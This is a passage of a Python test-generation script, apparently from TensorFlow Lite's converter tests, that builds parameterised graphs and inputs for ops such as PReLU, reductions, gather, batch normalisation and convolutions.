"input_shape": [[20, 20], [20, 20, 20]],
"shared_axes": [[1]],
}
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
prelu = tf.keras.layers.PReLU(shared_axes=parameters["shared_axes"])
out = prelu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_shape = parameters["input_shape"]
input_values = create_tensor_data(
np.float32, input_shape, min_value=-10, max_value=10)
shared_axes = parameters["shared_axes"]
alpha_shape = []
for dim in range(1, len(input_shape)):
alpha_shape.append(1 if dim in shared_axes else input_shape[dim])
alpha_values = create_tensor_data(np.float32, alpha_shape)
# There should be only 1 trainable variable tensor.
variables = tf.all_variables()
assert len(variables) == 1
sess.run(variables[0].assign(alpha_values))
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
use_frozen_graph=True)
@register_make_test_function()
def make_leaky_relu_tests(options):
"""Make a set of tests to do LeakyRelu."""
test_parameters = [
{
"input_shape": [[], [1], [5], [1, 10, 10, 3], [3, 3, 3, 3]],
"alpha": [0.1, 1.0, 2.0, -0.1, -1.0, -2.0],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.leaky_relu(input_tensor, alpha=parameters["alpha"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# This function tests various TensorFlow functions that generate a Const op,
# including `tf.ones`, `tf.zeros` and random functions.
@register_make_test_function()
def make_constant_tests(options):
"""Make a set of tests to do constant ops."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[], [1], [2], [1, 1, 1, 1], [2, 2, 2, 2]],
"constant_is_also_output": [True, False],
# This is a regression test for a bug where Toco rejects models with
# unread inputs.
"has_unread_input": [True, False],
}]
def build_graph(parameters):
dummy_input = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape"])
constant = tf.constant(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
outputs = [tf.maximum(dummy_input, constant)]
if parameters["constant_is_also_output"]:
outputs.append(constant)
inputs = [dummy_input]
if parameters["has_unread_input"]:
unread_input = tf.placeholder(
dtype=parameters["dtype"],
name="unread_input",
shape=parameters["input_shape"])
inputs.append(unread_input)
return inputs, outputs
def build_inputs(parameters, sess, inputs, outputs):
dummy_input = np.zeros(
parameters["input_shape"], dtype=_TF_TYPE_INFO[parameters["dtype"]][0])
return [dummy_input], sess.run(outputs, feed_dict={inputs[0]: dummy_input})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
def make_binary_op_tests(options, binary_operator, expected_tf_failures=0):
"""Make a set of tests to do binary ops with and without broadcast."""
test_parameters = [
# Avoid creating all combinations to keep the test size small.
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True],
},
{
"dtype": [tf.float32],
"input_shape_1": [[5]],
"input_shape_2": [[5]],
"activation": [False, True],
},
{
"dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_1": [[1, 3, 4, 3]],
"input_shape_2": [[3]],
"activation": [True, False],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape_1": [[3]],
"input_shape_2": [[1, 3, 4, 3]],
"activation": [True, False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[]],
"input_shape_2": [[]],
"activation": [False],
},
{
"dtype": [tf.float32],
"input_shape_1": [[0]],
"input_shape_2": [[1]],
"activation": [False],
}
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input1 = tf.placeholder(
dtype=parameters["dtype"],
name="input1",
shape=parameters["input_shape_1"])
input2 = tf.placeholder(
dtype=parameters["dtype"],
name="input2",
shape=parameters["input_shape_2"])
out = binary_operator(input1, input2)
if parameters["activation"]:
out = tf.nn.relu(out)
return [input1, input2], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input1 = create_tensor_data(parameters["dtype"],
parameters["input_shape_1"])
input2 = create_tensor_data(parameters["dtype"],
parameters["input_shape_2"])
return [input1, input2], sess.run(
outputs, feed_dict={
inputs[0]: input1,
inputs[1]: input2
})
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
def make_reduce_tests(reduce_op,
min_value=-10,
max_value=10,
boolean_tensor_only=False):
"""Make a set of tests to do reduce operation.
Args:
reduce_op: TensorFlow reduce operation to test, i.e. `tf.reduce_mean`.
min_value: min value for created tensor data.
max_value: max value for created tensor data.
boolean_tensor_only: If true, will only generate tensor with boolean value.
Returns:
a function representing the true generator with `reduce_op_in` curried.
"""
def f(options):
"""Actual function that generates examples."""
test_parameters = [
{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape": [[3, 3, 2, 4]],
"axis": [
0, 1, 2, [0, 1], [0, 2], [1, 2], [0, 1, 2], [1, 0], [2, 0],
[2, 1], [2, 1, 0], [2, 0, 1], -1, -2, -3, [1, -1], [0, -1],
[-1, 0], [-1, -2, -3], [0, 0, 0], [2, 2, 0], [1, 0, -3, -3]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[1, 8, 8, 3]],
"axis": [
0, 1, 2, 3, [1, 2], [0, 3], [1, 2, 3], [0, 1, 2,
3], [3, 2, 1, 0],
[3, 1, 0, 2], [2, 0], [3, 0], [3, 1], [1, 0], -1, -2, -3, -4,
[0, -2], [2, 3, -1, 0], [3, 1, 2, -3], [3, -4], [2, 2, 2],
[2, 2, 3], [-3, -3, -4], [-3, 2, 1]
],
"const_axis": [True, False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [[]], # shape is: [0]
"const_axis": [False],
"keepdims": [True, False],
},
{
"input_dtype": [tf.float32],
"input_shape": [[], [1, 8, 8, 3], [3, 2, 4]],
"axis": [None], # shape is: []
"const_axis": [True],
"keepdims": [True, False],
}
]
def build_graph(parameters):
"""Build the mean op testing graph."""
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
input_tensor = tf.placeholder(
dtype=dtype, name="input", shape=parameters["input_shape"])
# Get axis as either a placeholder or constants.
if parameters["const_axis"]:
axis = parameters["axis"]
input_tensors = [input_tensor]
else:
if isinstance(parameters["axis"], list):
shape = [len(parameters["axis"])]
else:
shape = [] # shape for None or integers.
axis = tf.placeholder(dtype=tf.int32, name="axis", shape=shape)
input_tensors = [input_tensor, axis]
out = reduce_op(
input_tensor, axis=axis, keepdims=parameters["keepdims"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
dtype = parameters["input_dtype"]
if boolean_tensor_only:
dtype = tf.bool
values = [
create_tensor_data(
dtype,
parameters["input_shape"],
min_value=min_value,
max_value=max_value)
]
if not parameters["const_axis"]:
values.append(np.array(parameters["axis"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
return f
@register_make_test_function()
def make_mean_tests(options):
"""Make a set of tests to do mean."""
return make_reduce_tests(tf.reduce_mean)(options)
@register_make_test_function()
def make_sum_tests(options):
"""Make a set of tests to do sum."""
return make_reduce_tests(tf.reduce_sum)(options)
@register_make_test_function()
def make_reduce_prod_tests(options):
"""Make a set of tests to do prod."""
# set min max value to be -2, 2 to avoid overflow.
return make_reduce_tests(tf.reduce_prod, -2, 2)(options)
@register_make_test_function()
def make_reduce_max_tests(options):
"""Make a set of tests to do max."""
return make_reduce_tests(tf.reduce_max)(options)
@register_make_test_function()
def make_reduce_min_tests(options):
"""Make a set of tests to do min."""
return make_reduce_tests(tf.reduce_min)(options)
@register_make_test_function()
def make_reduce_any_tests(options):
"""Make a set of tests to do any."""
return make_reduce_tests(tf.reduce_any, boolean_tensor_only=True)(options)
@register_make_test_function()
def make_exp_tests(options):
"""Make a set of tests to do exp."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the exp op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.exp(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-100, max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_cos_tests(options):
"""Make a set of tests to do cos."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the cos op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.cos(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"], parameters["input_shape"],
min_value=-np.pi, max_value=np.pi)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_log_softmax_tests(options):
"""Make a set of tests to do log_softmax."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape": [[1, 100], [4, 2], [5, 224]],
}]
def build_graph(parameters):
"""Build the log_softmax op testing graph."""
input_tensor = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.nn.log_softmax(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(
parameters["input_dtype"],
parameters["input_shape"],
min_value=-100,
max_value=9)
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_maximum_tests(options):
"""Make a set of tests to do maximum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the maximum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.maximum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
@register_make_test_function()
def make_minimum_tests(options):
"""Make a set of tests to do minimum."""
test_parameters = [{
"input_dtype": [tf.float32],
"input_shape_1": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
"input_shape_2": [[], [3], [1, 100], [4, 2, 3], [5, 224, 224, 3]],
}]
def build_graph(parameters):
"""Build the minimum op testing graph."""
input_tensor_1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_1",
shape=parameters["input_shape_1"])
input_tensor_2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input_2",
shape=parameters["input_shape_2"])
out = tf.minimum(input_tensor_1, input_tensor_2)
return [input_tensor_1, input_tensor_2], [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_1"]),
create_tensor_data(parameters["input_dtype"],
parameters["input_shape_2"])
]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=8)
def make_binary_op_tests_func(binary_operator):
"""Return a function that does a test on a binary operator."""
return lambda options: make_binary_op_tests(options, binary_operator)
@register_make_test_function()
def make_add_tests(options):
make_binary_op_tests(options, tf.add)
@register_make_test_function()
def make_add_n_tests(options):
"""Make a set of tests for AddN op."""
test_parameters = [
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[2, 5, 3, 1]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[5]],
"num_inputs": [2, 3, 4, 5],
},
{
"dtype": [tf.float32, tf.int32],
"input_shape": [[]],
"num_inputs": [2, 3, 4, 5],
},
]
def build_graph(parameters):
"""Builds the graph given the current parameters."""
input_tensors = []
for i in range(parameters["num_inputs"]):
input_tensors.append(
tf.placeholder(
dtype=parameters["dtype"],
name="input_{}".format(i),
shape=parameters["input_shape"]))
out = tf.add_n(input_tensors)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Builds operand inputs for op."""
input_data = []
for i in range(parameters["num_inputs"]):
input_data.append(
create_tensor_data(parameters["dtype"], parameters["input_shape"]))
return input_data, sess.run(
outputs, feed_dict={i: d for i, d in zip(inputs, input_data)})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_div_tests(options):
make_binary_op_tests(options, tf.div)
@register_make_test_function()
def make_sub_tests(options):
make_binary_op_tests(options, tf.subtract)
@register_make_test_function()
def make_mul_tests(options):
make_binary_op_tests(options, tf.multiply)
@register_make_test_function()
def make_pow_tests(options):
make_binary_op_tests(options, tf.pow, expected_tf_failures=7)
@register_make_test_function()
def make_floor_div_tests(options):
make_binary_op_tests(options, tf.floor_div)
@register_make_test_function()
def make_floor_mod_tests(options):
make_binary_op_tests(options, tf.floormod)
@register_make_test_function()
def make_squared_difference_tests(options):
make_binary_op_tests(options, tf.squared_difference)
@register_make_test_function()
def make_gather_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[10], [1, 2, 20]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3], [5]],
"axis": [-1, 0, 1],
},
{
# TODO(b/123895910): add Nd support for strings.
"params_dtype": [tf.string],
"params_shape": [[8]],
"indices_dtype": [tf.int32],
"indices_shape": [[3]],
"axis": [0],
}
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
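    # Cap the axis at the params rank. The capped value can still be out of
    # range (e.g. axis=1 with 1-D params); those cases are covered by
    # expected_tf_failures below.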
axis = min(len(parameters["params_shape"]), parameters["axis"])
out = tf.gather(params, indices, axis=axis)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
  # Note that TF can't execute with axis=1 and params_shape=[10].
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_gather_nd_tests(options):
"""Make a set of tests to do gather_nd."""
test_parameters = [
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 1]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[1, 1]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[2, 1], [2, 2]],
},
{
"params_dtype": [tf.float32, tf.int32, tf.int64],
"params_shape": [[5, 5, 10]],
"indices_dtype": [tf.int32, tf.int64],
"indices_shape": [[3, 1], [2, 2], [2, 3], [2, 1, 3]],
},
]
def build_graph(parameters):
"""Build the gather_nd op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
indices = tf.placeholder(
dtype=parameters["indices_dtype"],
name="indices",
shape=parameters["indices_shape"])
out = tf.gather_nd(params, indices)
return [params, indices], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
indices = create_tensor_data(parameters["indices_dtype"],
parameters["indices_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, indices], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, indices])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_gather_with_constant_tests(options):
"""Make a set of test which feed a constant to gather toco."""
test_parameters = [{
"input_shape": [[3]],
"reference_shape": [[2]],
}, {
"input_shape": [[2, 3]],
"reference_shape": [[2, 3]],
}]
def build_graph(parameters):
"""Build a graph where the inputs to Gather are constants."""
reference = tf.placeholder(
dtype=tf.int32, shape=parameters["reference_shape"])
gather_input = tf.constant(
create_tensor_data(tf.int32, parameters["input_shape"]))
gather_indices = tf.constant([0, 1], tf.int32)
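    # Both Gather inputs are constants, so the converter should be able to
    # resolve the gather at conversion time; comparing against a fed-in
    # reference checks the folded values.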
out = tf.equal(reference, tf.gather(gather_input, gather_indices))
return [reference], [out]
def build_inputs(parameters, sess, inputs, outputs):
reference_values = np.zeros(parameters["reference_shape"], dtype=np.int32)
return [reference_values], sess.run(
outputs, feed_dict={inputs[0]: reference_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_embedding_lookup_tests(options):
"""Make a set of tests to do gather."""
test_parameters = [
{
"params_dtype": [tf.float32],
"params_shape": [[10], [10, 10]],
"ids_dtype": [tf.int32],
"ids_shape": [[3], [5]],
},
]
def build_graph(parameters):
"""Build the gather op testing graph."""
params = tf.placeholder(
dtype=parameters["params_dtype"],
name="params",
shape=parameters["params_shape"])
ids = tf.placeholder(
dtype=parameters["ids_dtype"],
name="ids",
shape=parameters["ids_shape"])
out = tf.nn.embedding_lookup(params, ids)
return [params, ids], [out]
def build_inputs(parameters, sess, inputs, outputs):
params = create_tensor_data(parameters["params_dtype"],
parameters["params_shape"])
ids = create_tensor_data(parameters["ids_dtype"],
parameters["ids_shape"], 0,
parameters["params_shape"][0] - 1)
return [params, ids], sess.run(
outputs, feed_dict=dict(zip(inputs, [params, ids])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs)
@register_make_test_function()
def make_global_batch_norm_tests(options):
"""Make a set of tests to do batch_norm_with_global_normalization."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2], [3, 4, 5, 4]],
"epsilon": [0.1, 0.0001],
"scale_after": [True, False],
}]
def build_graph(parameters):
"""Build the global batch norm testing graph."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
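    # The normalization itself runs on constant data, so it can be folded at
    # conversion time; adding the result to a placeholder keeps a real graph
    # input.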
x_norm = tf.nn.batch_norm_with_global_normalization(
x, mean, variance, scale, offset,
parameters["epsilon"], parameters["scale_after"])
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_fused_batch_norm_tests(options):
"""Make a set of tests to do fused_batch_norm."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 1, 6, 2]],
"epsilon": [0.001, 0.1],
}]
def build_graph(parameters):
"""Build the testing graph for fused batch normalization."""
input_shape = parameters["input_shape"]
scale_shape = input_shape[3]
scale = create_tensor_data(parameters["dtype"], scale_shape)
offset = create_tensor_data(parameters["dtype"], scale_shape)
mean = create_tensor_data(parameters["dtype"], scale_shape)
variance = create_tensor_data(parameters["dtype"], scale_shape)
x = create_tensor_data(parameters["dtype"], parameters["input_shape"])
[x_norm, _, _] = tf.nn.fused_batch_norm(
x, scale, offset, mean, variance,
parameters["epsilon"], data_format="NHWC", is_training=False)
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.add(input_tensor, x_norm)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_conv_tests(options):
"""Make a set of tests to do convolution."""
test_parameters = [{
"input_shape": [[1, 3, 4, 3], [4, 6, 6, 1]],
"filter_shape": [[1, 1], [2, 3], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 2, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
"constant_filter": [True, False],
"channel_multiplier": [1, 2],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=40)
# Note: This is a regression test for a bug (b/122651451) that Toco incorrectly
# erases the reduction indices array while it's shared with other ops.
@register_make_test_function()
def make_l2norm_shared_epsilon_tests(options):
"""Regression test for a bug (b/122651451)."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[5, 7]],
"dim": [1],
"epsilon": [1e-8],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
epsilon = tf.constant(parameters["epsilon"])
out1 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out2 = tf.nn.l2_normalize(input_tensor, parameters["dim"], epsilon=epsilon)
out = out1 + out2
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112436267) that Toco incorrectly
# fuses weights when multiple Conv2D/FULLY_CONNECTED ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 3]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [1],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
input_tensors = [input_tensor]
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
# Ensure that FuseBinaryIntoFollowingAffine works with an input which
# is shared by multiple affine ops.
conv_input = input_tensor + 0.1
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add MUL ops after Conv2D ops. These MUL ops should be fused into the
# weights of Conv2D.
result1 = result1 * 2
result2 = result2 * 3
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
    # The filter is a constant in this test, so only the input tensor is fed.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112303004) that Toco incorrectly
# transforms Conv into DepthwiseConv when two Conv ops share the same constant
# weight tensor.
@register_make_test_function()
def make_conv_to_depthwiseconv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 1]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [3],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Construct a constant weights tensor which will be used by both Conv2D.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
input_tensors = [input_tensor]
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
    # The filter is a constant in this test, so only the input tensor is fed.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_depthwiseconv_tests(options):
"""Make a set of tests to do convolution."""
  # TensorFlow's depthwise_conv2d only supports equal strides along height
  # and width.
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [1, 10, 10, 3]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"channel_multiplier": [1, 2],
"rate": [[1, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
},
{
"input_shape": [[1, 3, 4, 3]],
"filter_size": [[1, 1]],
"strides": [[1, 1, 2, 1]], # TF needs [1, x, x, 1]
"dilations": [[1, 1, 1, 1], [1, 2, 2, 1]],
"channel_multiplier": [2],
"rate": [[2, 2]], # Only [1, 1] is supported
"padding": ["SAME"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a depthwise conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
